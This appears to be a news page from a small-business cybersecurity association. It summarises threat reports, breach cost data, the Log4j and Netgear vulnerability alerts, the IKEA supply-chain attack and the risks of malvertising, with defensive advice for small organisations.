News

Trellix Threat Report, Summer 2022

July 18, 2022: Trellix, a cybersecurity company, announced that they have released their Threat Report Summer 2022.

Analysis includes healthcare, access control systems, email phishing trends, and details the evolution of Russian cybercrime related to the conflict in Ukraine where new malware or methods have yet to be observed. Key findings interpret data showing increased threats to business services, ransomware evolution, and telling signs in email security trends.

The report is free. You can view and download the report here.

The Threat Report: Summer 2022 leverages proprietary data from Trellix’s network of over one billion sensors, open-source intelligence and Trellix Threat Labs investigations into prevalent threats like ransomware and nation-state activity. Telemetry related to detection of threats is used for the purposes of this report. A detection is when a file, URL, IP-address, suspicious email, network behavior or other indicator is detected and reported via the Trellix XDR ecosystem.

2021 IBM Cost of a Data Breach Report is now available

You can download the report for free, but they do require your contact information.

https://www.ibm.com/security/data-breach

In addition to a fine cost analysis, the report also summarizes data on initial attack vectors that were primarily responsible for causing the breaches, and the length of time it took the organizations to detect and contain their breaches.

Key points and updates for SMB's:

  • Cloud security efforts and management are essential;
  • 20% (1 in 5) breaches were caused by compromised credentials (which is the largest compromise vector);
  • Overall, it took an average of 287 days to identify and contain a data breach, seven days longer than in 2020;
  • Customer PII (Personally Identifiable Information) was both the highest cost (avg. $180 per record) in a breach and the most breached (44% of breaches).

IBM uses the following four costs centers to calculate the cost of a breach:
Detection and escalation
— Forensic and investigative activities
— Assessment and audit services
— Crisis management
— Communications to executives and boards
Notification
— Emails, letters, outbound calls or general
notice to data subjects
— Determination of regulatory requirements
— Communication with regulators
— Engagement of outside experts
Lost business
— Business disruption and revenue losses
from system downtime
— Cost of lost customers and acquiring new customers
— Reputation losses and diminished goodwill
Post breach response
— Help desk and inbound communications
— Credit monitoring and identity protection services
— Issuing new accounts or credit cards
— Legal expenditures
— Product discounts
— Regulatory fine

Lost business was the largest cost, averaging 38% of total cost of an incident.

Members can keep watch for updates to the SOISA Playbook templates for simple actions for SMBs to take to become more secure.

JAVA Zero-Day Exploit log4j may affect your infrastructure

DATELINE: Monday, December 13, 2021

UPDATE: Monday, January 10, 2022 - The Log4j Zero-Day Vulnerability Response page at the Center for Internet Security has updated fixes.

An alert went out to SOISA members regarding a zero-day exploit that has affected Cisco appliances, software, and network management tools as well as hundreds of other applications and thousands of servers.
Apple, Microsoft, and many services, games, and network monitoring systems are affected, with more to be discovered over the coming days and weeks, no doubt.

If you have a cybersecurity service, then they already know about this. You might want to ask if they can run deep scans through your internal network systems both to check for the vulnerability and to check for evidence of compromise and post-exploitation activity on your network. If you don't have a cybersecurity service for your company, you will want to ask your cyber/IT staff or contractors to quickly check your systems (see resources below) and take appropriate measures to mitigate and remediate.

This is a big zero-day, for example, able to take complete control of a Minecraft server and the computers of all the players on it with a single chat message. As many IT staff and cloud services run Minecraft servers on space machines, at home, or on developer boxes, this is just one example of how this vulnerability can be used to quickly penetrate home and corporate networks through a "side door". The Cisco systems vulnerabilities have even more devastating potential. Fortunately, the infosec community and IT professionals are acting quickly to provide free scanning tools, security system rules, and more to help.

Cisco Systems Vulernability Advisory
A fully automated, accurate, and extensive scanner to find log4j-vulnerable systems
Rules and Methods of Post-Exploitation Network Activity Detection by NCC Group

UPDATE: The CISA page on log4j vulnerability guidance is recommended for the latest information and mitigations.

We give our thanks and kudos to the professionals and groups that have provided such quick response, generosity, and dedication to the cause!

Thousands of Netgear Wi-Fi routers need to be patched now — here's how

35 models need urgent updates

British security firm Immersive Labs has discovered three flaws that affect thousands of Netgear routers. These flaws can be used to allow attackers to gain full access to any router if they can access the admin interface. This is an obvious vulnerability for attackers doing lateral movement, but many companies have configured routers show the administration interface to the Internet at large in order to enable remote management, thinking it is secure enough.

Upgrade now. This article over at Tom's Guide shows you how and gives all the models of affected routers.

IKEA cyberattacked via compromised organizations and partners

Small and medium businesses often wonder why they would be the targets of a cyber attack when they hold little or no "valuable" data, don't have loads of cash for ransoms, and don't have cyber insurance (to fund ransom payments). The answer is that the SMB networks and accounts are used to launch further attacks on large organizations. These organizations have beefed up their cybersecurity on their servers and network connections, and thus can often thrawt or defend against direct, front-door cyber attacks.

So now cyber adversaries are using trusted connections between vendors and partner companies to get their malware and phishing emails past the cyber defenses. And they want your network and accounts so that they can do that.

News Article, November 26, 2021: IKEA email systems hit by ongoing cyberattack

The above article describes exactly what this kind of attack looks like.

Take action today: learn more about cybersecurity for your organization.

Protecting your organization against malware via web ads

Over the years, delivering advertisements to web pages has become a major source of revenue for web site operators, especially social media sites. The entire business plan and revenue stream for sites like Facebook is based on delivering targeted ads to users via their browser, phone, or tablet computer. Billions of ads are served each year.

Unfortunately, malware can be and is being delivered via these ads. Sophisticated Javascript and other browser tricks are used to deposit malware on user's devices with nary a click needed. The malware can spy on users, read browser history, lift passwords and logins stored in the browser, intercept logins to other sites and copy the credentials, open pages and perform clicks in the background, and even redirect users to different websites that look real. Browser companies try to keep up with the crafty attacks, but so far have had limited success. Several of the big browsers have taken the route of becoming spies and traffic-interceptors themselves in the name of protecting users, which, in a way, just moves the problem.

The NSA, CIA, FBI, DHS, and other agencies in the US Intelligence community use ad-blockers to combat the problem. Your organization should, too.

The costs of a single malware or ransomware attack now average over a million dollars for small and medium-sized organizations. Due to the shifting cyber attack landscape, the real choice SMB's face now is: do I allow an open, known avenue of attack to operate on my organization's computers and possibly infect my network, workstations, and laptops with ransomware and malware, or do I let a content site gain a few cents by casting an ad onto my screen? Most ads aren't malicious. Of course, some of them are. The problem has been getting worse.

Until advertising networks and browser platforms can provide a completely safe and secure ad delivery mechanism that can't be abused by malicious actors to infect user browsers and machines, organizations simply cannot be expected to risk accepting these adverts. It's a shame that many good content and service providers will suffer from this. These are just one of the costs inflicted by cyber attackers and foreign agents.

Options for protecting your organization's network include using a Pi-hole -- software that blocks requests for the adverts and automatically updates the lists of ad servers and files -- or using a set of ad-blocker and security extensions on all of your organization's machines and devices. Check our membership content for TechKits for both of these options, or do web searches to learn more.

Tags: 
PiHole

SMB Stats (2019): 43% of successful cyber attacks involve small organizations

The Verizon 2019 Data Breach Investigations Report has the latest figures, and small businesses and organizations have recently become bigger targets.

43% of the breaches in 2018 involved small businesses or organizations.

With big businesses ramping up their cyber security defenses, small organizations have become the new low-hanging fruit for hackers. It isn't always for money or data, many times it is to get access from your business computers and infrastructure: not only do they get access to the vendor accounts of the business, they can use the business's computers and assets to launch attacks so their identity is hidden.

It's more important than ever that small organizations make cyber security part of their normal business practices. You don't have to spend a lot of money on fancy software and appliances: most of the breaches into small organizations were because of misconfigurations, password simplicity and re-use, and lack of patching systems with updates. Simple changes in the regular attention to a few details can move your organization out of the low-hanging-fruit zone.

That's where SOISA comes in. We develop and share specific, simple, actionable cybersecurity information that is tailored for small organizations, helping each other and spreading the costs over many members. This makes quality, tailored information affordable and timely.